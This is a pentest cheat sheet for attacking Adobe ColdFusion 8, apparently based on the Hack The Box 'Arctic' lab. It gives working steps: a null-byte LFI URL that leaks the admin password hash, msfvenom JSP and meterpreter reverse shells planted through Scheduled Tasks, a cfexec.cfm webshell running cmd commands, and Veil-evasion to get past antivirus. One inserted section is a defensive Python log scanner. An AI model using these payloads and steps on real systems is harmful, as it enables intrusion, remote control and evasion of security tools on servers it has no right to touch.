# ColdFusion

## Basics

* <https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html>
* <https://pentest.tonyng.net/attacking-adobe-coldfusion/>
* REF: Arctic-HTB

## Local File Inclusion - Password Leak!

* ColdFusion 8 CVE
* <https://www.exploit-db.com/exploits/14641/>
* Use the LFI to read the administrator password hash from `password.properties`:

```
http://$IP:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
```
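Detection side of the request above, as an added example that is not part of the original notes: a scan of web access logs for `/CFIDE/` requests whose `locale` parameter carries directory traversal, a null byte, or the `password.properties` file name. The common log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in common log format (assumed; adapt the regex to your server).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 1234',
    '192.0.2.66 - - [01/Jan/2024:10:00:05 +0000] "GET /CFIDE/administrator/enter.cfm'
    '?locale=../../../../ColdFusion8/lib/password.properties%00en HTTP/1.1" 200 2345',
    '192.0.2.66 - - [01/Jan/2024:10:00:09 +0000] "GET /CFIDE/administrator/enter.cfm'
    '?locale=%2e%2e%5c%2e%2e%5clib%5cpassword.properties%2500en HTTP/1.1" 200 2345',
    '192.0.2.10 - - [01/Jan/2024:10:01:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 1234',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def locale_findings(value):
    """Return the reasons a locale value looks like the traversal request."""
    for _ in range(3):  # undo nested percent-encoding, e.g. %2500 -> %00 -> NUL
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    reasons = []
    if "\x00" in value:
        reasons.append("null-byte")
    if re.search(r"\.\.[/\\]", value):
        reasons.append("traversal")
    if "password.properties" in value.lower():
        reasons.append("password.properties")
    return reasons

def scan(lines):
    """Return (client, path, status, reasons) for each suspicious /CFIDE/ request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().startswith("/cfide/"):
            continue
        for key, val in parse_qsl(url.query, keep_blank_values=True):
            if key.lower() == "locale" and (reasons := locale_findings(val)):
                hits.append((client, url.path, int(status), reasons))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit answered with status 200 means the hash should be treated as disclosed: change the administrator password and restrict access to `/CFIDE/administrator`.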

## Reverse Shell

* If you have administrator access to ColdFusion,
* you can upload a Java (JSP) reverse shell

```
Create:
msfvenom --list payloads | grep java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$MyIP LPORT=4444 -f raw > shell.jsp

Share:
python -m SimpleHTTPServer
python3 -m http.server

Upload:
Coldfusion > Debugging > Scheduled Tasks
URL : http://$MyIP:8000/shell.jsp
Publish: Save output to file - Yes!
File: \ColdFusion8\wwwroot\CFIDE\shell.jsp
Submit & Run

Execute:
http://$IP:8500/CFIDE/shell.jsp 

Catch:
nc -nvlp 4444
whoami
.. tolis!
```

## Webshell

* If you have administrator access to ColdFusion,
* you can upload "cfexec.cfm"
* <https://jumpespjump.blogspot.co.uk/2014/03/attacking-adobe-coldfusion.html> (bad link)
* <https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/cfm/cfExec.cfm>
* `/usr/share/webshells/cfm/cfexec.cfm` (on Kali)

```
vim cfexec.cfm
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://$MyIP:8000/cfexec.cfm
Publish: Save output to file - Yes!
\ColdFusion8\wwwroot\CFIDE\cfexec.cfm
Submit & Run

Execute:
http://$IP:8500/CFIDE/cfexec.cfm

Command: C:\windows\system32\cmd.exe
Options: /c whoami > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c DIR C:\Users > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c type C:\Users\tolis\Desktop\user.txt > C:\ColdFusion8\wwwroot\CFIDE\output.txt
Options: /c systeminfo > C:\ColdFusion8\wwwroot\CFIDE\output.txt

Browse : http://$IP:8500/CFIDE/output.txt
.. arctic\tolis
.. C:\Users\tolis
.. Flag!!
.. Windows Server 2008 R2 64-Bit
```

## Reverse Executable

* You may be able to upload a reverse executable
* Avoid AV detection with [Veil](https://pentest.mxhx.org/03-getting-in/03-veil)

```
----------------------------------
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$MyIP LPORT=4444 -f exe > arctic.exe
python -m SimpleHTTPServer

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.exe
\ColdFusion8\wwwroot\CFIDE\arctic.exe

msf > use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 10.10.13.10
set LPORT 4444
run

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE > C:\ColdFusion8\wwwroot\CFIDE\output.txt
http://10.10.10.11:8500/CFIDE/output.txt
.. Found: 'arctic.exe'
.. BLOCKED by Antivirus

----------------------------------
Bypass Antivirus with veil-evasion

>  veil-evasion
>> list
>> choose '24'.. Powershell/meterpreter/rev_tcp
>> LHOST=$MyIP
>> LPORT=4444
>> generate
.. 'arctic'.. which makes 'arctic.bat'
cp arctic.bat .

Coldfusion > Debugging > Scheduled Task
http://10.10.12.166:8000/arctic.bat
C:\ColdFusion8\wwwroot\CFIDE\arctic.bat

http://$IP:8500/CFIDE/cfexec.cfm
Command: C:\windows\system32\cmd.exe
Options: /c DIR C:\ColdFusion8\wwwroot\CFIDE\arctic.bat
May need to try this 2-3 Times.. but will work!!

MSF - Connected!
```

## Other:

* Also consider:
* <https://arrexel.com/coldfusion-8-0-1-arbitrary-file-upload/>
